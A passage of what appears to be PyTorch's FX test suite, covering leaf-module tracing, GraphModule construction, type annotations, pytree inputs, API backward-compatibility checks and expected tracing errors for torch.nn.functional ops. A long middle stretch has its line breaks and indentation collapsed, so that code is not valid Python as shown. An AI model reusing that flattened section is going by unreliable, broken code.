        class SubModule(torch.nn.Module):
            def __init__(self):
                super().__init__()
                self.linear = torch.nn.Linear(10, 10)
                self.relu = torch.nn.ReLU()

            def forward(self, x):
                x = self.linear(x)
                x = self.relu(x)
                return x

        class Model(torch.nn.Module):
            def __init__(self):
                super().__init__()
                self.submod = SubModule()

            def forward(self, x):
                x = self.submod(x)
                return x

        model = Model()

        class MyCustomTracer(torch.fx.Tracer):
            def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
                return module_qualified_name == "submod"

        inputs = torch.randn(1, 10)
        traced_graph = MyCustomTracer().trace(model)
        gm2 = torch.fx.GraphModule(model, traced_graph)
        gm2.delete_all_unused_submodules()
        torch.testing.assert_allclose(gm2(inputs), model(inputs))

    def test_tracing_graphmodules_as_leaf_submodules(self):
        """Check how leaf-vs-inlined treatment interacts with submodules
        that are themselves GraphModules or define a custom __call__."""
        class A(torch.nn.Module):
            def forward(self, t):
                return t + t

        class B(torch.nn.Module):
            def __init__(self):
                super(type(self), self).__init__()
                self.calling = False
                self.called = False

            def forward(self, t):
                if self.calling:
                    return t - t
                else:
                    return t + t

            def __call__(self, *args):
                self.called = True
                self.calling = True
                return super(type(self), self).__call__(*args)
                # NOTE(review): the next line is unreachable (after return);
                # present in the original source.
                self.calling = False

        class M(torch.nn.Module):
            def __init__(self, a, b):
                super().__init__()
                self.a = a
                self.b = b

            def forward(self, t):
                x = self.a(t)
                y = self.b(t)
                return x + y

        class LeafTracer(Tracer):
            def is_leaf_module(self, module, name):
                return True

        class LeafTracerNotB(Tracer):
            def is_leaf_module(self, module, name):
                return False if "b" in name else True

        # Recompile calls added "for fun", since they
        # chain __call__ wrappers.

        #
        # Test: B as a regular, non-leaf module
        #
        a = symbolic_trace(A())
        a.recompile()
        m = M(a, B())
        graph = LeafTracerNotB().trace(m)
        gm = GraphModule(m, graph)
        gm.recompile()

        # Test graphmodule/submodule a is not inlined.
        self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
        match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
        self.assertTrue(len(match) == 1)

        # Test submodule b is not treated as leaf.
        self.assertFalse(hasattr(gm, "b"))

        # Test assert custom __call__ on submodule b was honored.
        match = [
            n for n in gm.graph.nodes if n.op == "call_function" and n.target == operator.sub
        ]
        self.assertTrue(len(match) == 1)

        #
        # Test: B as a regular, leaf module
        # symbolic_trace should only patch torch.nn.Module.__call__,
        # which means B.__call__ should still execute
        #
        a = symbolic_trace(A())
        a.recompile()
        b = B()
        m = M(a, b)
        graph = LeafTracer().trace(m)
        gm = GraphModule(m, graph)
        gm.recompile()

        # Test graphmodule/submodule a is not inlined.
        self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
        match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
        self.assertTrue(len(match) == 1)

        # Test submodule b is leaf:
        self.assertTrue(isinstance(gm.get_submodule("b"), torch.nn.Module))
        match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "b"]
        self.assertTrue(len(match) == 1)

        # Test b.__call__ was run
        self.assertTrue(b.called)
        self.assertTrue(gm.get_submodule("b").called)

        #
        # Test: B as GraphModule leaf
        # __call__ not honored since symbolic_trace directly invokes forward()
        #
        a = symbolic_trace(A())
        a.recompile()
        b = symbolic_trace(B())
        b.recompile()
        m = M(a, b)
        graph = LeafTracer().trace(m)
        gm = GraphModule(m, graph)
        gm.recompile()

        self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
        match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
        self.assertTrue(len(match) == 1)

        self.assertTrue(isinstance(gm.get_submodule("b"), torch.nn.Module))
        match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "b"]
        self.assertTrue(len(match) == 1)

    def _test_graph_module_init_buffer_param_copied(self, use_dict_init: bool):
        """Shared driver: GraphModule construction must copy buffers and
        parameters from either a state dict or a root module."""
        class MyModule(torch.nn.Module):
            def __init__(self):
                super().__init__()
                self.register_buffer("my_buff", torch.rand(3, 4))
                self.register_parameter(
                    "my_param", torch.nn.Parameter(torch.rand(3, 4))
                )

            def forward(self, x):
                return x + self.my_buff + self.my_param

        mod = MyModule()
        mod_traced = symbolic_trace(mod)

        # Create new GraphModule based on original, either
# w/ dict or root module.
        orig_buff = mod_traced.get_buffer("my_buff")
        orig_param = mod_traced.get_parameter("my_param")
        mod_traced_new = GraphModule(
            {"my_buff": orig_buff, "my_param": orig_param} if use_dict_init else mod,
            mod_traced.graph,
        )

        # Check that both my_buff and my_param are found and the same.
        try:
            new_buff = mod_traced_new.get_buffer("my_buff")
        except Exception:
            self.fail("Did not find my_buff")
        self.assertEqual(orig_buff, new_buff)

        try:
            new_param = mod_traced_new.get_parameter("my_param")
        except Exception:
            self.fail("Did not find my_param")
        self.assertEqual(orig_param, new_param)

        x = torch.rand(3, 4)
        orig_out = mod_traced(x)
        submodules_out = mod_traced_new(x)

        self.assertEqual(orig_out, submodules_out)

    def test_graph_module_init_buffer_param_copied_dict_init(self):
        self._test_graph_module_init_buffer_param_copied(use_dict_init=True)

    def test_graph_module_init_buffer_param_copied_mod_init(self):
        self._test_graph_module_init_buffer_param_copied(use_dict_init=False)

    def test_annotations_with_no_forward_references(self):
        class A:
            def __call__(self, x: torch.Tensor):
                return torch.add(x, x)

        class M(torch.nn.Module):
            def forward(self, x: torch.Tensor, a: A) -> torch.Tensor:
                return a(x)

        self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)

    def test_annotations_with_forward_references(self):
        class A:
            def __call__(self, x: torch.Tensor):
                return torch.add(x, x)

        class M(torch.nn.Module):
            def forward(self, x: 'torch.Tensor', a: 'A') -> 'torch.Tensor':
                return a(x)

        self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)

    def test_annotations_with_non_torch_reference_and_no_internal_forward_references(self):
        class A:
            def __call__(self, x: torch.Tensor):
                return torch.add(x, x)

        class M(torch.nn.Module):
            def forward(self, x: List[torch.Tensor], a: A) -> torch.Tensor:
                return a(x[0])

        self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)

    def test_annotations_with_non_torch_reference_and_internal_forward_references(self):
        class A:
            def __call__(self, x: torch.Tensor):
                return torch.add(x, x)

        class M(torch.nn.Module):
            def forward(self, x: List['torch.Tensor'], a: A) -> 'torch.Tensor':
                return a(x)[0]

        self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)

    @unittest.skipIf(sys.version_info < (3, 7), "`__future__` feature "
                     "`annotations` is not defined in Python <3.7")
    def test_annotation_with_future(self):
        try:
            import fx.test_future    # noqa: F401
        finally:
            del sys.modules["__future__"]

    def test_annotations_empty_tuple(self):
        """Empty-tuple annotations must survive tracing and scripting."""
        class Foo(torch.nn.Module):
            def forward(self, x: Tuple[()], y: Tuple[str, Tuple[()]]):
                return "foo"

        traced = torch.fx.symbolic_trace(Foo())

        x = ()
        y = ("bar", ())

        traced(x, y)

        FileCheck().check("_Tuple[()]") \
                   .check("typing_Tuple[str,typing_Tuple[()]]") \
                   .run(traced.code)

        scripted = torch.jit.script(traced)

        scripted(x, y)

        FileCheck().check("Tuple[()]") \
                   .check("Tuple[str, Tuple[()]]") \
                   .run(scripted.code)

    @unittest.skipIf(IS_WINDOWS, "Python Windows bug? https://bugs.python.org/issue45108")
    def test_assert(self):
        """With trace_asserts enabled, a traced `assert` still fires."""
        def f(x):
            assert x > 1
            return x + 1
        try:
            torch.fx.proxy.TracerBase.trace_asserts = True
            traced = symbolic_trace(f)
        finally:
            torch.fx.proxy.TracerBase.trace_asserts = False

        self.assertEqual(f(2), traced(2))
        with self.assertRaises(AssertionError):
            traced(0)

    def test_pytree(self):
        """Trace functions over pytree-structured inputs via concrete_args
        and verify flattening specs round-trip through pickling."""
        def f_sum(x):
            return sum(x)

        def f_sum_dict(x):
            out = 0
            for k, v in x.items():
                out += v
            return out

        def f_dict_list_map(x):
            new_dict = {}
            for k, v in x.items():
                new_dict[k] = [i + 1 for i in v]
            return new_dict

        def f_dict_add(x):
            return x['a'] + sum(x['z'])

        def f_namedtuple_add(x):
            return x.x + x.y

        pytree._register_pytree_node(
            Foo,
            lambda x: ([x.a, x.b], None),
            lambda x, _: Foo(x[0], x[1]),
        )
        fx_pytree.register_pytree_flatten_spec(Foo, lambda x, _: [x.a, x.b])

        def f_custom(x):
            return x.a + x.b

        def f_custom_dict(x):
            return f_sum_dict(x.a) + x.b

        def f_return_custom(x):
            return Foo(x.b, x.a)

        tests = [
            (f_sum, [PH, PH, PH]),
            (f_sum, []),
            (f_sum_dict, {'a': PH, 'b': PH, 'c': PH}),
            (f_dict_list_map, {'a': (PH, PH), 'b': [PH], 'c': []}),
            (f_dict_list_map, {5: (PH, PH, PH)}),
            (f_dict_add, {'a': PH, 'z': (PH, PH, PH)}),
            (f_dict_add, {'a': PH, 'z': []}),
            (f_custom, Foo(PH, PH)),
            (f_custom, Foo(PH, 3)),
            (f_custom_dict, Foo({'a': PH, 'b': PH}, PH)),
            # (f_return_custom, Foo(PH, PH)),  # Don't currently support output pytrees
            (f_namedtuple_add, Point(PH, PH)),
        ]

        def verify_pytree(f, inp):
            # Replace each PH placeholder with a real tensor value.
            val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp)
            num_flat_args = len([i == PH for i in pytree.tree_flatten(inp)[0]])
            orig_out = f(val)
            nf = symbolic_trace(f, concrete_args={'x': inp})
            self.assertEqual(nf(val), orig_out)
            assert num_flat_args == 0 or "tree_flatten_spec" in nf.code
            assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args)

            # Re-tracing without concrete_args collapses back to one placeholder.
            nf = symbolic_trace(nf)
            self.assertEqual(nf(val), orig_out)
            assert "tree_flatten_spec" not in nf.code
            assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == 1)

            nf = symbolic_trace(nf, concrete_args={'x': inp})
            self.assertEqual(nf(val), orig_out)
            assert num_flat_args == 0 or "tree_flatten_spec" in nf.code
            assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args)

            pickled = pickle.dumps(nf)
            nf = pickle.loads(pickled)
            self.assertEqual(nf(val), orig_out)

        for f, inp in tests:
            verify_pytree(f, inp)

    def test_pytree_concrete(self):
        def f(b, a):
            if b:
                return a['a']
            else:
                return a['z']

        inp = {'a': {'a': PH, 'z': PH}, 'b': True}
        nf = symbolic_trace(f, concrete_args=inp)
        val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp)
        self.assertEqual(nf(**val), f(**val))

        nf = symbolic_trace(nf)
        self.assertEqual(nf(**val), f(**val))

    def test_imul_code_print(self):
        """In-place operators must be emitted as augmented assignment."""
        graph = torch.fx.Graph()
        a = graph.placeholder("a")
        b = graph.placeholder("b")
        graph.call_function(operator.imul, (a, b), {})
        graph.output(a)
        gm = torch.fx.GraphModule({}, graph)
        gm.recompile()
        self.assertEqual(gm(2, 3), 6)
        self.assertIn("a *= b", gm.code)


def run_getitem_target():
    from torch.fx._symbolic_trace \
import _wrapped_methods_to_patch _wrapped_methods_to_patch.append((torch.Tensor, "__getitem__")) try: TestFX().getitem_inner() finally: _wrapped_methods_to_patch.pop() class TestOperatorSignatures(JitTestCase): def setUp(self): # Checking for mutable operations whil tracing is feature flagged # Enable it in testing but not by default self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations torch.fx.proxy.TracerBase.check_mutable_operations = True def tearDown(self): torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag @onlyCPU @ops(op_db, allowed_dtypes=(torch.float,)) def test_get_torch_func_signature_exhaustive(self, device, dtype, op): if not isinstance(op.op, types.BuiltinFunctionType): raise unittest.SkipTest("This path doesn't work on Python functions") sample_inputs_itr = op.sample_inputs(device, dtype, requires_grad=False) schemas = get_signature_for_torch_op(op.op) if not schemas: raise RuntimeError('No Schemas Returned') for sample_input in sample_inputs_itr: # Iterate through overloads until we hit a match. 
If we exit this # loop via `else`, we haven't found a match for schema in schemas: try: bound_args = schema.bind(sample_input.input, *sample_input.args, **sample_input.kwargs) bound_args.apply_defaults() op(*bound_args.args, **bound_args.kwargs) break except TypeError as e: pass else: raise RuntimeError(f'Did not match any schemas for op {op.name}!') class TestFXAPIBackwardCompatibility(JitTestCase): def setUp(self): self.maxDiff = None # Checking for mutable operations whil tracing is feature flagged # Enable it in testing but not by default self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations torch.fx.proxy.TracerBase.check_mutable_operations = True def tearDown(self): torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag def _fn_to_stable_annotation_str(self, obj): """ Unfortunately we have to serialize function signatures manually since serialization for `inspect.Signature` objects is not stable across python versions """ fn_name = torch.typename(obj) signature = inspect.signature(obj) sig_str = f'{fn_name}{signature}' arg_strs = [] for k, v in signature.parameters.items(): maybe_type_annotation = f': {self._annotation_type_to_stable_str(v.annotation, sig_str)}'\ if v.annotation is not inspect.Signature.empty else '' def default_val_str(val): if isinstance(val, (tuple, list)): str_pieces = ['(' if isinstance(val, tuple) else '['] str_pieces.append(', '.join(default_val_str(v) for v in val)) if isinstance(val, tuple) and len(str_pieces) == 2: str_pieces.append(',') str_pieces.append(')' if isinstance(val, tuple) else ']') return ''.join(str_pieces) # Need to fix up some default value strings. # First case: modules. Default module `repr` contains the FS path of the module. # Don't leak that if isinstance(val, types.ModuleType): return f'<module {val.__name__}>' # Second case: callables. Callables (such as lambdas) encode their address in # their string repr. 
Don't do that if callable(val): return f'<function {val.__name__}>' return str(val) if v.default is not inspect.Signature.empty: default_val_str = default_val_str(v.default) if not isinstance(v.default, str) else f"'{v.default}'" maybe_default = f' = {default_val_str}' else: maybe_default = '' maybe_stars = '' if v.kind == inspect.Parameter.VAR_POSITIONAL: maybe_stars = '*' elif v.kind == inspect.Parameter.VAR_KEYWORD: maybe_stars = '**' arg_strs.append(f'{maybe_stars}{k}{maybe_type_annotation}{maybe_default}') return_annot = f' -> {self._annotation_type_to_stable_str(signature.return_annotation, sig_str)}'\ if signature.return_annotation is not inspect.Signature.empty else '' return f'{fn_name}({", ".join(arg_strs)}){return_annot}' def _annotation_type_to_stable_str(self, t, sig_str): if t is inspect.Signature.empty: return '' # Forward ref if isinstance(t, str): return f"'{t}'" if hasattr(typing, 'ForwardRef') and isinstance(t, typing.ForwardRef): return t.__forward_arg__ if hasattr(typing, '_ForwardRef') and isinstance(t, typing._ForwardRef): return t.__forward_arg__ trivial_mappings = { str : 'str', int : 'int', float: 'float', bool: 'bool', torch.dtype: 'torch.dtype', torch.Tensor: 'torch.Tensor', torch.device: 'torch.device', torch.memory_format: 'torch.memory_format', slice: 'slice', torch.nn.Module: 'torch.nn.modules.module.Module', torch.fx.Graph : 'torch.fx.graph.Graph', torch.fx.Node : 'torch.fx.node.Node', torch.fx.Proxy : 'torch.fx.proxy.Proxy', torch.fx.node.Target : 'torch.fx.node.Target', torch.fx.node.Argument : 'torch.fx.node.Argument', torch.fx.graph.PythonCode : 'torch.fx.graph.PythonCode', torch.fx.graph_module.GraphModule: 'torch.fx.graph_module.GraphModule', torch.fx.subgraph_rewriter.Match: 'torch.fx.subgraph_rewriter.Match', Ellipsis : '...', typing.Any: 'Any', type(None): 'NoneType', None: 'None', typing.Iterator: 'Iterator', } mapping = trivial_mappings.get(t, None) if mapping: return mapping # Handle types with contained types contained 
= getattr(t, '__args__', None) or [] # Callables contain a bare List for arguments contained = t if isinstance(t, list) else contained # Python 3.8 puts type vars into __args__ for unbound types such as Dict if all(isinstance(ct, typing.TypeVar) for ct in contained): contained = [] contained_type_annots = [self._annotation_type_to_stable_str(ct, sig_str) for ct in contained] contained_type_str = f'[{", ".join(contained_type_annots)}]' if len(contained_type_annots) > 0 else '' origin = getattr(t, '__origin__', None) if origin is None: # Unbound types don't have `__origin__` in some Python versions, so fix that up here. origin = t if t in {typing.Tuple, typing.Union, typing.Dict, typing.List, typing.Type, typing.Callable} else origin if origin in {tuple, typing.Tuple}: return f'Tuple{contained_type_str}' if origin in {typing.Union}: # Annoying hack to detect Optional if len(contained) == 2 and (contained[0] is type(None)) ^ (contained[1] is type(None)): not_none_param = contained[0] if contained[0] is not type(None) else contained[1] return f'Optional[{self._annotation_type_to_stable_str(not_none_param, sig_str)}]' return f'Union{contained_type_str}' if origin in {dict, typing.Dict}: return f'Dict{contained_type_str}' if origin in {list, typing.List}: return f'List{contained_type_str}' if origin in {type, typing.Type}: return f'Type{contained_type_str}' if isinstance(t, typing.Callable): if len(contained) > 0 and contained[0] is not Ellipsis: return f'Callable[[{", ".join(contained_type_annots[:-1])}], {contained_type_annots[-1]}]' else: return f'Callable{contained_type_str}' raise RuntimeError(f'Unrecognized type {t} used in BC-compatible type signature {sig_str}.' f'Please add support for this type and confirm with the ' f'FX team that your signature change is valid.') def test_function_back_compat(self): """ Test backward compatibility for function signatures with @compatibility(is_backward_compatible=True). 
Currently this checks for exact signature matches, which may lead to false positives. If this becomes too annoying, we can refine this check to actually parse out the saved schema strings and check if the change is truly backward- incompatible. """ signature_strs = [] for obj in _BACK_COMPAT_OBJECTS: if not isinstance(obj, type): signature_strs.append(self._fn_to_stable_annotation_str(obj)) signature_strs.sort() try: self.assertExpected('\n'.join(signature_strs), 'fx_backcompat_function_signatures') except AssertionError as e: msg = f"{e}\n****** ERROR ******\nAn FX function that has been marked " \ f"as backwards-compatible has experienced a signature change. See the " \ f"above exception context for more information. If this change was " \ f"unintended, please revert it. If it was intended, check with the FX " \ f"team to ensure that the proper deprecation protocols have been followed " \ f"and subsequently --accept the change." raise AssertionError(msg) def test_class_member_back_compat(self): """ Test backward compatibility for members of classes with @compatibility(is_backward_compatible=True). Currently this checks for exact matches on the publicly visible members of the class. """ class_method_strs = [] for obj in _BACK_COMPAT_OBJECTS: if isinstance(obj, type): public_members = [name for name in obj.__dict__ if not name.startswith('_')] class_method_strs.append(f'{torch.typename(obj)} {sorted(public_members)}') class_method_strs.sort() try: self.assertExpected('\n'.join(class_method_strs), 'fx_backcompat_class_members') except AssertionError as e: msg = f"{e}\n****** ERROR ******\nAn FX class that has been marked " \ f"as backwards-compatible has experienced change in its public members. See the " \ f"above exception context for more information. If this change was " \ f"unintended, please revert it. If it was intended, check with the FX " \ f"team to ensure that the proper deprecation protocols have been followed " \ f"and subsequently --accept the change." 
raise AssertionError(msg) def test_public_api_surface(self): non_back_compat_objects = {} def check_symbols_have_bc_designation(m, prefix): if not m.__name__.startswith('torch.fx'): return if m.__name__.startswith('torch.fx.experimental'): return for k, v in m.__dict__.items(): if v is m: continue if k.startswith('_'): continue if isinstance(v, types.ModuleType): check_symbols_have_bc_designation(v, prefix + [k]) elif isinstance(v, type) or isinstance(v, types.FunctionType): if v not in _MARKED_WITH_COMATIBLITY: non_back_compat_objects.setdefault(v) check_symbols_have_bc_designation(torch.fx, ['torch', 'fx']) check_symbols_have_bc_designation(torch.fx.passes, ['torch', 'fx', 'passes']) non_back_compat_strs = [torch.typename(obj) for obj in non_back_compat_objects.keys()] # Only want objects in torch.fx non_back_compat_strs = [ s for s in non_back_compat_strs if s.startswith('torch.fx') and not s.startswith('torch.fx.experimental')] # Only want objects in public namespaces non_back_compat_strs = [ s for s in non_back_compat_strs if all(not atom.startswith('_') for atom in s.split('.'))] non_back_compat_strs.sort() if len(non_back_compat_strs) != 0: raise AssertionError(f"Public FX API(s) {non_back_compat_strs} introduced but not given a " f"backwards-compatibility classification! 
f"Please decorate these "
                                 f"API(s) with `@torch.fx._compatibility.compatibility` to specify "
                                 f"BC guarantees.")


class TestFunctionalTracing(JitTestCase):
    """Generates one test per torch.nn.functional callable, asserting either
    that it traces or that it fails with the expected exception class."""

    def setUp(self):
        # Checking for mutable operations while tracing is feature flagged
        # Enable it in testing but not by default
        self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
        torch.fx.proxy.TracerBase.check_mutable_operations = True

    def tearDown(self):
        torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag

    # Supporting/dispatch helpers that are not themselves traceable targets.
    IGNORE_FUNCS = ("has_torch_function", "has_torch_function_unary",
                    "has_torch_function_variadic", "handle_torch_function",
                    "boolean_dispatch")
    # Placeholders filled by setUpClass with the real functions being patched.
    TO_PATCH = {"has_torch_function": None,
                "has_torch_function_unary": None,
                "has_torch_function_variadic": None}

    # (expected exception class, regex matched against its message)
    BUILT_IN_FUNC = (AssertionError, "")
    PROXY_ITERABLE = (TypeError, r"argument of type 'Proxy' is not iterable")
    PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated")
    LEN_ERROR = (RuntimeError, r"'len' is not supported in symbolic tracing by default")
    ARG_TYPE_MISMATCH = (TypeError, r", not Proxy$")
    CONTROL_FLOW = (TraceError, r"symbolically traced variables cannot be used as inputs to control flow")
    INTERPOLATE_ARGS_CONFLICT = (ValueError, r"only one of size or scale_factor should be defined")
    MUTABLE = (RuntimeError, r"Tried to trace mutable operation")

    UNTRACEABLE_FUNCTIONALS = {
        "adaptive_avg_pool1d": BUILT_IN_FUNC,
        "avg_pool1d": BUILT_IN_FUNC,
        "avg_pool2d": BUILT_IN_FUNC,
        "avg_pool3d": BUILT_IN_FUNC,
        "celu_": BUILT_IN_FUNC,
        "channel_shuffle": BUILT_IN_FUNC,
        "conv1d": BUILT_IN_FUNC,
        "conv2d": BUILT_IN_FUNC,
        "conv3d": BUILT_IN_FUNC,
        "conv_tbc": BUILT_IN_FUNC,
        "conv_transpose1d": BUILT_IN_FUNC,
        "conv_transpose2d": BUILT_IN_FUNC,
        "conv_transpose3d": BUILT_IN_FUNC,
        "cosine_similarity": BUILT_IN_FUNC,
        "elu_": BUILT_IN_FUNC,
        "hardtanh_": BUILT_IN_FUNC,
        "leaky_relu_": BUILT_IN_FUNC,
        "logsigmoid": BUILT_IN_FUNC,
        "one_hot": BUILT_IN_FUNC,
        "pdist": BUILT_IN_FUNC,
        "pixel_shuffle": BUILT_IN_FUNC,
        "pixel_unshuffle": BUILT_IN_FUNC,
        "relu_": BUILT_IN_FUNC,
        "rrelu_": BUILT_IN_FUNC,
        "selu_": BUILT_IN_FUNC,
        "softplus": BUILT_IN_FUNC,
        "softshrink": BUILT_IN_FUNC,
        "threshold_": BUILT_IN_FUNC,

        "adaptive_avg_pool2d": LEN_ERROR,
        "adaptive_avg_pool3d": LEN_ERROR,
        "adaptive_max_pool2d_with_indices": LEN_ERROR,
        "adaptive_max_pool3d_with_indices": LEN_ERROR,
        "instance_norm": CONTROL_FLOW,
        "pad": LEN_ERROR,

        "adaptive_max_pool1d": PROXY_ITERABLE,
        "adaptive_max_pool2d": PROXY_ITERABLE,
        "adaptive_max_pool3d": PROXY_ITERABLE,
        "fractional_max_pool2d": PROXY_ITERABLE,
        "fractional_max_pool3d": PROXY_ITERABLE,
        "max_pool1d": PROXY_ITERABLE,
        "max_pool2d": PROXY_ITERABLE,
        "max_pool3d": PROXY_ITERABLE,

        "group_norm": PROXY_ITERATED,
        "lp_pool2d": PROXY_ITERATED,
        "max_unpool1d": PROXY_ITERATED,
        "max_unpool2d": PROXY_ITERATED,
        "max_unpool3d": PROXY_ITERATED,

        "adaptive_max_pool1d_with_indices": ARG_TYPE_MISMATCH,
        "fractional_max_pool2d_with_indices": ARG_TYPE_MISMATCH,
        "fractional_max_pool3d_with_indices": ARG_TYPE_MISMATCH,
        "gelu": CONTROL_FLOW,
        "hardshrink": ARG_TYPE_MISMATCH,
        "layer_norm": ARG_TYPE_MISMATCH,
        "lp_pool1d": ARG_TYPE_MISMATCH,
        "pairwise_distance": ARG_TYPE_MISMATCH,

        "affine_grid": CONTROL_FLOW,
        "alpha_dropout": CONTROL_FLOW,
        "batch_norm": CONTROL_FLOW,
        "binary_cross_entropy": CONTROL_FLOW,
        "binary_cross_entropy_with_logits": CONTROL_FLOW,
        "celu": CONTROL_FLOW,
        "cosine_embedding_loss": CONTROL_FLOW,
        "cross_entropy": CONTROL_FLOW,
        "ctc_loss": CONTROL_FLOW,
        "dropout": CONTROL_FLOW,
        "dropout2d": CONTROL_FLOW,
        "dropout3d": CONTROL_FLOW,
        "elu": CONTROL_FLOW,
        "embedding": CONTROL_FLOW,
        "embedding_bag": CONTROL_FLOW,
        "feature_alpha_dropout": CONTROL_FLOW,
        "fold": CONTROL_FLOW,
        "gaussian_nll_loss": CONTROL_FLOW,
        "glu": CONTROL_FLOW,
        "grid_sample": CONTROL_FLOW,
        "gumbel_softmax": CONTROL_FLOW,
        "hardsigmoid": CONTROL_FLOW,
        "hardswish": CONTROL_FLOW,
        "hardtanh": CONTROL_FLOW,
        "hinge_embedding_loss": CONTROL_FLOW,
        "huber_loss": CONTROL_FLOW,
        "interpolate": CONTROL_FLOW,
        "kl_div": CONTROL_FLOW,
        "l1_loss": CONTROL_FLOW,
        "leaky_relu": CONTROL_FLOW,
        "local_response_norm": CONTROL_FLOW,
        "margin_ranking_loss": CONTROL_FLOW,
        "max_pool1d_with_indices": CONTROL_FLOW,
        "max_pool2d_with_indices": CONTROL_FLOW,
        "max_pool3d_with_indices": CONTROL_FLOW,
        "mse_loss": CONTROL_FLOW,
        "multi_head_attention_forward": CONTROL_FLOW,
        "multi_margin_loss": CONTROL_FLOW,
        "multilabel_margin_loss": CONTROL_FLOW,
        "multilabel_soft_margin_loss": CONTROL_FLOW,
        "nll_loss": CONTROL_FLOW,
        "poisson_nll_loss": CONTROL_FLOW,
        "relu": CONTROL_FLOW,
        "relu6": CONTROL_FLOW,
        "rrelu": CONTROL_FLOW,
        "selu": CONTROL_FLOW,
        "silu": CONTROL_FLOW,
        "mish": CONTROL_FLOW,
        "smooth_l1_loss": CONTROL_FLOW,
        "soft_margin_loss": CONTROL_FLOW,
        "threshold": CONTROL_FLOW,
        "triplet_margin_loss": CONTROL_FLOW,
        "triplet_margin_with_distance_loss": CONTROL_FLOW,
        "unfold": CONTROL_FLOW,
        "upsample": CONTROL_FLOW,

        "upsample_bilinear": INTERPOLATE_ARGS_CONFLICT,
        "upsample_nearest": INTERPOLATE_ARGS_CONFLICT,

        "normalize" : MUTABLE,
    }

    # List of nn.functionals with Tensor inputs but not with type annotation
    FUNCTIONALS_WITHOUT_ANNOTATION = (
        "adaptive_max_pool1d",
        "adaptive_max_pool2d",
        "adaptive_max_pool3d",
        "fractional_max_pool2d",
        "fractional_max_pool3d",
        "max_pool1d",
        "max_pool2d",
        "max_pool3d",
        "gaussian_nll_loss",
        "upsample",
        "upsample_bilinear",
        "upsample_nearest",
    )

    # Inconsistent behavior between Python 3.8 and other Python versions:
    # - Python 3.8+: Re-raise internal exception like `PROXY_ITERATED`
    # - Other Python: Raise `argument of type 'Proxy' is not iterable` due to the same
    #                 internal exception above
    # Use the following map to override the expected exception for Python 3.8
    UNTRACEABLE_FUNCTIONALS_PY38 = {
        "adaptive_max_pool1d": PROXY_ITERATED,
        "adaptive_max_pool2d": PROXY_ITERATED,
        "adaptive_max_pool3d": PROXY_ITERATED,
        "fractional_max_pool2d": PROXY_ITERATED,
        "fractional_max_pool3d": PROXY_ITERATED,
        "max_pool1d": PROXY_ITERATED,
        "max_pool2d": PROXY_ITERATED,
        "max_pool3d": PROXY_ITERATED,

        "group_norm": LEN_ERROR
    }

    @classmethod
    def _get_functional(cls):
        """Collect the (name, fn) pairs from torch.nn.functional to test."""
        functional_list = []
        for f in dir(torch.nn.functional):
            if not f.islower():
                continue
            # Ignore internal functions
            if f.startswith('_'):
                continue
            # Ignore supporting functions
            if f in cls.IGNORE_FUNCS:
                continue
            fn = getattr(torch.nn.functional, f)
            # Ignore non-callable object like modules
            if not isinstance(fn, Callable):
                continue
            if f not in cls.FUNCTIONALS_WITHOUT_ANNOTATION:
                try:
                    sig = inspect.signature(fn)
                    has_tensor_arg = False
                    for arg, param in sig.parameters.items():
                        if isinstance(param.annotation, type) and issubclass(param.annotation, torch.Tensor):
                            has_tensor_arg = True
                    # Skip functionals that take no Tensor arguments at all.
                    if not has_tensor_arg:
                        continue
                # No signature or Object is not supported
                except ValueError:
                    pass
            functional_list.append((f, fn))
        return functional_list

    @classmethod
    def generate_test_func(cls, func_name, fn):

        def functional_test(self):
            # Python 3.8/3.9 surface a different exception for some ops; see
            # the comment on UNTRACEABLE_FUNCTIONALS_PY38.
            if func_name in self.UNTRACEABLE_FUNCTIONALS_PY38 and \
                    sys.version_info >= (3, 8) and sys.version_info < (3, 10):
                exc, err = self.UNTRACEABLE_FUNCTIONALS_PY38[func_name]
                with self.assertRaisesRegex(exc, err):
                    symbolic_trace(fn)
            elif func_name in self.UNTRACEABLE_FUNCTIONALS:
                exc, err = self.UNTRACEABLE_FUNCTIONALS[func_name]
                with self.assertRaisesRegex(exc, err):
                    symbolic_trace(fn)
            else:
                symbolic_trace(fn)
        return functional_test

    @classmethod
    def generate_tests(cls):
        functional_list = cls._get_functional()
        for func_name, fn in functional_list:
            test_name = "test_nn_functional_" + func_name
            functional_test = cls.generate_test_func(func_name, fn)
            setattr(cls, test_name, functional_test)

    @classmethod
    def setUpClass(cls):
        # Patch the has_torch_function* fast paths to always report False so
        # tracing takes the plain-Python code path; restored in tearDownClass.

        def no(*args, **kwargs):
            return False

        for name in cls.TO_PATCH.keys():
            cls.TO_PATCH[name] = getattr(torch.nn.functional, name)
            setattr(torch.nn.functional, name, no)

    @classmethod
    def tearDownClass(cls):
        for name in cls.TO_PATCH.keys():
            setattr(torch.nn.functional, name, cls.TO_PATCH[name])

TestFunctionalTracing.generate_tests()

instantiate_device_type_tests(TestOperatorSignatures,
globals())


@skipIfNoTorchVision
class TestVisionTracing(JitTestCase):
